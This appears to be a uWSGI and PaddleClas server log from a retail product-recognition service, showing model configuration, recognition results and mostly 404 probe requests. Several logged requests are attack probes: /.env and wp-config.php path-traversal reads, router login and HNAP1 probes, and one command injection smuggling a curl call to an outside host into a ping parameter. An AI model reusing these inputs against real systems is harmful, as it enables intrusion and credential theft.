+2022-01-29 16:12:07 INFO: cpu_num_threads : 1 +2022-01-29 16:12:07 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-29 16:12:07 INFO: enable_benchmark : True +2022-01-29 16:12:07 INFO: enable_mkldnn : True +2022-01-29 16:12:07 INFO: enable_profile : False +2022-01-29 16:12:07 INFO: gpu_mem : 8000 +2022-01-29 16:12:07 INFO: image_shape : [3, 640, 640] +2022-01-29 16:12:07 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-29 16:12:07 INFO: ir_optim : True +2022-01-29 16:12:07 INFO: labe_list : ['foreground'] +2022-01-29 16:12:07 INFO: max_det_results : 5 +2022-01-29 16:12:07 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-29 16:12:07 INFO: rec_nms_thresold : 0.05 +2022-01-29 16:12:07 INFO: threshold : 0.2 +2022-01-29 16:12:07 INFO: use_fp16 : False +2022-01-29 16:12:07 INFO: use_gpu : False +2022-01-29 16:12:07 INFO: use_tensorrt : False +2022-01-29 16:12:07 INFO: IndexProcess : +2022-01-29 16:12:07 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-29 16:12:07 INFO: return_k : 5 +2022-01-29 16:12:07 INFO: score_thres : 0.5 +2022-01-29 16:12:07 INFO: RecPostProcess : None +2022-01-29 16:12:07 INFO: RecPreProcess : +2022-01-29 16:12:07 INFO: transform_ops : +2022-01-29 16:12:07 INFO: ResizeImage : +2022-01-29 16:12:07 INFO: size : 224 +2022-01-29 16:12:07 INFO: NormalizeImage : +2022-01-29 16:12:07 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 16:12:07 INFO: order : +2022-01-29 16:12:07 INFO: scale : 0.00392157 +2022-01-29 16:12:07 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 16:12:07 INFO: ToCHWImage : None +Inference: 385.2193355560303 ms per batch image +[{'bbox': [150, 50, 552, 479], 'rec_docs': '江小白', 'rec_scores': 0.7525106}] +{'bbox': [150, 50, 552, 479], 'rec_docs': '江小白', 'rec_scores': 0.7525106} +234 +["{'bbox': [150, 50, 552, 479], 'rec_docs': '江小白', 'rec_scores': 0.7525106}\n"] +['江小白'] +['江小白', '20'] +[pid: 13129|app: 0|req: 185/201] 101.83.69.232 () {34 vars in 448 bytes} [Sat Jan 29 16:12:06 2022] POST /reference_client/ => generated 114 bytes in 3115 msecs (HTTP/1.1 200) 5 headers in 158 bytes (9 switches on core 0) +[pid: 13127|app: 0|req: 3/202] 101.133.135.162 () {22 vars in 236 bytes} [Sat Jan 29 16:15:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13127|app: 0|req: 4/203] 101.133.135.162 () {22 vars in 297 bytes} [Sat Jan 29 16:15:55 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13126|app: 0|req: 2/204] 101.133.135.162 () {22 vars in 240 bytes} [Sat Jan 29 16:16:05 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13126|app: 0|req: 3/205] 101.133.135.162 () {22 vars in 240 bytes} [Sat Jan 29 16:16:09 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 186/206] 101.133.135.162 () {40 vars in 485 bytes} [Sat Jan 29 16:16:13 2022] OPTIONS sip:nm => generated 179 bytes in 2 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 187/207] 34.140.248.32 () {42 vars in 562 bytes} [Sat Jan 29 16:26:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 188/208] 45.83.66.221 () {42 vars in 575 bytes} [Sat Jan 29 17:09:37 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 189/209] 45.83.66.189 () {42 vars in 597 bytes} [Sat Jan 29 17:09:38 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 190/210] 128.199.160.152 () {36 vars in 529 bytes} [Sat Jan 29 18:04:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 191/211] 128.199.160.152 () {38 vars in 551 bytes} [Sat Jan 29 18:07:57 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 192/212] 23.251.102.74 () {34 vars in 487 bytes} [Sat Jan 29 18:36:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 193/213] 103.207.42.166 () {36 vars in 590 bytes} [Sat Jan 29 20:02:58 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 194/214] 103.207.42.166 () {40 vars in 697 bytes} [Sat Jan 29 20:03:10 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 195/215] 209.17.96.114 () {30 vars in 410 bytes} [Sat Jan 29 20:41:56 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 196/216] 47.101.196.6 () {34 vars in 458 bytes} [Sat Jan 29 21:16:24 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13128|app: 0|req: 13/217] 167.248.133.118 () {28 vars in 312 bytes} [Sat Jan 29 21:20:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 197/218] 167.248.133.118 () {34 vars in 444 bytes} [Sat Jan 29 21:20:02 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 198/219] 83.97.20.34 () {30 vars in 329 bytes} [Sat Jan 29 21:20:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 199/220] 109.237.103.9 () {36 vars in 523 bytes} [Sat Jan 29 22:11:35 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 200/221] 136.144.41.117 () {40 vars in 568 bytes} [Sat Jan 29 22:17:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 201/222] 109.237.103.123 () {36 vars in 525 bytes} [Sat Jan 29 22:32:24 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 202/223] 39.99.236.165 () {34 vars in 411 bytes} [Sat Jan 29 22:35:58 2022] POST /sdk => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 203/224] 39.99.236.165 () {32 vars in 409 bytes} [Sat Jan 29 22:35:58 2022] GET /text4041643495757 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 204/225] 39.99.236.165 () {32 vars in 395 bytes} [Sat Jan 29 22:35:58 2022] GET /evox/about => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 205/226] 39.99.236.165 () {28 vars in 307 bytes} [Sat Jan 29 22:35:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 206/227] 39.99.236.165 () {32 vars in 385 bytes} [Sat Jan 29 22:35:58 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 207/228] 39.99.236.165 () {36 vars in 463 bytes} [Sat Jan 29 22:36:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 208/229] 39.99.236.165 () {34 vars in 414 bytes} [Sat Jan 29 22:36:08 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 209/230] 164.90.142.228 () {40 vars in 658 bytes} [Sat Jan 29 23:06:13 2022] HEAD / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 210/231] 83.97.20.34 () {26 vars in 287 bytes} [Sun Jan 30 00:02:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 211/232] 195.94.182.79 () {32 vars in 463 bytes} [Sun Jan 30 01:31:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 212/233] 47.102.154.221 () {34 vars in 441 bytes} [Sun Jan 30 01:38:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 213/234] 167.94.146.59 () {28 vars in 310 bytes} [Sun Jan 30 01:46:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 214/235] 167.94.146.59 () {34 vars in 442 bytes} [Sun Jan 30 01:46:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 215/236] 178.62.69.128 () {48 vars in 876 bytes} [Sun Jan 30 01:50:13 2022] POST /boaform/admin/formLogin => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 216/237] 183.136.225.56 () {34 vars in 456 bytes} [Sun Jan 30 03:22:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.119 client_port: 50429] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 13129|app: 0|req: 217/238] 83.97.20.34 () {30 vars in 329 bytes} [Sun Jan 30 03:40:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 218/239] 20.124.2.234 () {42 vars in 899 bytes} [Sun Jan 30 04:01:06 2022] GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 219/240] 20.124.2.234 () {42 vars in 790 bytes} [Sun Jan 30 04:01:06 2022] GET /_profiler/phpinfo => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 220/241] 20.114.175.20 () {36 vars in 589 bytes} [Sun Jan 30 04:29:49 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 221/242] 20.114.175.20 () {40 vars in 696 bytes} [Sun Jan 30 04:29:49 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 222/243] 39.103.154.124 () {32 vars in 503 bytes} [Sun Jan 30 04:53:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 223/244] 143.198.136.88 () {32 vars in 365 bytes} [Sun Jan 30 05:18:28 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 224/245] 151.242.218.166 () {36 vars in 522 bytes} [Sun Jan 30 05:40:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 225/246] 83.97.20.34 () {26 vars in 287 bytes} [Sun Jan 30 06:08:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 226/247] 47.100.2.4 () {34 vars in 437 bytes} [Sun Jan 30 07:38:16 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 227/248] 192.241.206.75 () {34 vars in 394 bytes} [Sun Jan 30 08:00:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13128|app: 0|req: 14/249] 106.75.22.49 () {30 vars in 327 bytes} [Sun Jan 30 08:03:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 228/250] 39.99.254.87 () {24 vars in 259 bytes} [Sun Jan 30 08:24:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 229/251] 39.99.254.87 () {34 vars in 636 bytes} [Sun Jan 30 08:24:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13127|app: 0|req: 5/252] 39.99.254.87 () {26 vars in 313 bytes} [Sun Jan 30 08:24:47 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13126|app: 0|req: 4/253] 39.99.254.87 () {26 vars in 311 bytes} [Sun Jan 30 08:24:47 2022] GET /robots.txt => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 123.160.221.18 client_port: 9344] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 13129|app: 0|req: 230/254] 123.160.221.18 () {28 vars in 313 bytes} [Sun Jan 30 08:45:42 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 231/255] 111.7.100.17 () {42 vars in 739 bytes} [Sun Jan 30 08:45:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 232/256] 111.7.100.16 () {42 vars in 760 bytes} [Sun Jan 30 08:45:44 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +*** Starting uWSGI 2.0.20 (64bit) on [Sun Jan 30 16:56:26 2022] *** +compiled with version: 7.5.0 on 26 January 2022 07:48:28 +os: Linux-4.15.0-166-generic #174-Ubuntu SMP Wed Dec 8 19:07:44 UTC 2021 +nodename: iZuf6i5vgnr6fuc47aapjkZ +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /root/Smart_container/conf/uwsgi +writing pidfile to /root/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /root/Smart_container +your processes number limit is 15592 +your memory page size is 4096 bytes +detected max file descriptor number: 65535 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.6.9 (default, Dec 8 2021, 21:08:43) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x561407fca830 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x561407fca830 pid: 19137 (default app) +mountpoint already configured. skip. +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 19137) +spawned uWSGI worker 1 (pid: 19139, cores: 1) +spawned uWSGI worker 2 (pid: 19140, cores: 1) +spawned uWSGI worker 3 (pid: 19141, cores: 1) +spawned uWSGI worker 4 (pid: 19142, cores: 1) +spawned uWSGI worker 5 (pid: 19143, cores: 1) +spawned uWSGI worker 6 (pid: 19144, cores: 1) +spawned uWSGI worker 7 (pid: 19145, cores: 1) +spawned uWSGI worker 8 (pid: 19146, cores: 1) +spawned uWSGI worker 9 (pid: 19147, cores: 1) +spawned uWSGI worker 10 (pid: 19148, cores: 1) +spawned uWSGI http 1 (pid: 19149) +req +2022-01-30 08:56:49 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-30 08:56:49 INFO: DetPostProcess : +2022-01-30 08:56:49 INFO: DetPreProcess : +2022-01-30 08:56:49 INFO: transform_ops : +2022-01-30 08:56:49 INFO: DetResize : +2022-01-30 08:56:49 INFO: interp : 2 +2022-01-30 08:56:49 INFO: keep_ratio : False +2022-01-30 08:56:49 INFO: target_size : [640, 640] +2022-01-30 08:56:49 INFO: DetNormalizeImage : +2022-01-30 08:56:49 INFO: is_scale : True +2022-01-30 08:56:49 INFO: mean : [0.485, 0.456, 0.406] +2022-01-30 08:56:49 INFO: std : [0.229, 0.224, 0.225] +2022-01-30 08:56:49 INFO: DetPermute : +2022-01-30 08:56:49 INFO: Global : +2022-01-30 08:56:49 INFO: batch_size : 1 +2022-01-30 08:56:49 INFO: cpu_num_threads : 1 +2022-01-30 08:56:49 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-30 08:56:49 INFO: enable_benchmark : True +2022-01-30 08:56:49 INFO: enable_mkldnn : True +2022-01-30 08:56:49 INFO: enable_profile : False +2022-01-30 08:56:49 INFO: gpu_mem : 8000 +2022-01-30 08:56:49 INFO: image_shape : [3, 640, 640] +2022-01-30 08:56:49 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-30 08:56:49 INFO: ir_optim : True +2022-01-30 08:56:49 INFO: labe_list : ['foreground'] +2022-01-30 08:56:49 INFO: max_det_results : 5 +2022-01-30 08:56:49 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-30 08:56:49 INFO: rec_nms_thresold : 0.05 +2022-01-30 08:56:49 INFO: threshold : 0.2 +2022-01-30 08:56:49 INFO: use_fp16 : False +2022-01-30 08:56:49 INFO: use_gpu : False +2022-01-30 08:56:49 INFO: use_tensorrt : False +2022-01-30 08:56:49 INFO: IndexProcess : +2022-01-30 08:56:49 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-30 08:56:49 INFO: return_k : 5 +2022-01-30 08:56:49 INFO: score_thres : 0.5 +2022-01-30 08:56:49 INFO: RecPostProcess : None +2022-01-30 08:56:49 INFO: RecPreProcess : +2022-01-30 08:56:49 INFO: transform_ops : +2022-01-30 08:56:49 INFO: ResizeImage : +2022-01-30 08:56:49 INFO: size : 224 +2022-01-30 08:56:49 INFO: NormalizeImage : +2022-01-30 08:56:49 INFO: mean : [0.485, 0.456, 0.406] +2022-01-30 08:56:49 INFO: order : +2022-01-30 08:56:49 INFO: scale : 0.00392157 +2022-01-30 08:56:49 INFO: std : [0.229, 0.224, 0.225] +2022-01-30 08:56:49 INFO: ToCHWImage : None +Inference: 375.76818466186523 ms per batch image +[{'bbox': [158, 73, 342, 434], 'rec_docs': '小度充电宝', 'rec_scores': 0.65792215}] +{'bbox': [158, 73, 342, 434], 'rec_docs': '小度充电宝', 'rec_scores': 0.65792215} +234 +["{'bbox': [158, 73, 342, 434], 'rec_docs': '小度充电宝', 'rec_scores': 0.65792215}\n"] +['小度充电宝'] +['小度充电宝', '48'] +[pid: 19148|app: 0|req: 1/1] 49.79.98.245 () {34 vars in 447 bytes} [Sun Jan 30 08:56:47 2022] POST /reference_client/ => generated 126 bytes in 3187 msecs (HTTP/1.1 200) 5 headers in 158 bytes (2 switches on core 0) +[pid: 19148|app: 0|req: 2/2] 39.103.140.77 () {38 vars in 679 bytes} [Sun Jan 30 09:21:34 2022] GET / => generated 179 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 3/3] 39.103.140.77 () {30 vars in 356 bytes} [Sun Jan 30 09:21:41 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 4/4] 83.97.20.34 () {30 vars in 329 bytes} [Sun Jan 30 10:14:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 5/5] 173.225.110.122 () {34 vars in 800 bytes} [Sun Jan 30 10:16:18 2022] GET /cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;curl http://23.94.194.122:22810/hit.php;&ping_count=1&action=Apply&html_view=ping => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 6/6] 83.97.20.34 () {26 vars in 287 bytes} [Sun Jan 30 12:05:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 7/7] 103.203.56.1 () {34 vars in 388 bytes} [Sun Jan 30 13:20:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 8/8] 62.171.132.199 () {40 vars in 672 bytes} [Sun Jan 30 14:54:48 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 9/9] 223.71.167.166 () {34 vars in 459 bytes} [Sun Jan 30 15:25:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 10/10] 83.97.20.34 () {30 vars in 329 bytes} [Sun Jan 30 16:10:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 11/11] 20.119.205.188 () {36 vars in 524 bytes} [Sun Jan 30 16:11:27 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 12/12] 20.119.205.188 () {40 vars in 631 bytes} [Sun Jan 30 16:11:28 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 185.219.52.134 client_port: 33783] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 13/13] 128.14.134.134 () {34 vars in 565 bytes} [Sun Jan 30 17:39:36 2022] GET /Telerik.Web.UI.WebResource.axd?type=rau => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 14/14] 83.97.20.34 () {26 vars in 287 bytes} [Sun Jan 30 18:12:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 15/15] 185.180.143.8 () {34 vars in 487 bytes} [Sun Jan 30 18:13:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 16/16] 183.136.225.56 () {34 vars in 535 bytes} [Sun Jan 30 18:38:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 17/17] 47.102.104.161 () {34 vars in 432 bytes} [Sun Jan 30 19:36:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 18/18] 107.189.28.51 () {28 vars in 310 bytes} [Sun Jan 30 20:08:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 19/19] 107.189.28.51 () {40 vars in 671 bytes} [Sun Jan 30 20:08:39 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 20/20] 167.94.138.63 () {28 vars in 310 bytes} [Sun Jan 30 20:31:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 1/21] 167.94.138.63 () {34 vars in 442 bytes} [Sun Jan 30 20:31:50 2022] GET / => generated 179 bytes in 236 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 21/22] 1.202.113.123 () {40 vars in 719 bytes} [Sun Jan 30 21:19:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 2/23] 83.97.20.34 () {30 vars in 329 bytes} [Sun Jan 30 21:19:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 22/24] 39.103.151.239 () {22 vars in 235 bytes} [Sun Jan 30 22:05:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 23/25] 39.103.151.239 () {22 vars in 297 bytes} [Sun Jan 30 22:05:17 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 1/26] 39.103.151.239 () {22 vars in 238 bytes} [Sun Jan 30 22:05:23 2022] OPTIONS / => generated 179 bytes in 238 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 24/27] 39.103.151.239 () {22 vars in 239 bytes} [Sun Jan 30 22:05:26 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 25/28] 39.103.151.239 () {40 vars in 485 bytes} [Sun Jan 30 22:05:29 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 26/29] 107.189.28.51 () {28 vars in 310 bytes} [Sun Jan 30 22:56:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 27/30] 107.189.28.51 () {40 vars in 671 bytes} [Sun Jan 30 22:56:40 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 28/31] 128.14.209.162 () {34 vars in 488 bytes} [Sun Jan 30 22:59:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 29/32] 51.254.59.113 () {32 vars in 450 bytes} [Sun Jan 30 23:24:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 30/33] 209.17.96.74 () {30 vars in 409 bytes} [Sun Jan 30 23:43:45 2022] GET / => generated 179 bytes in 1 msecs 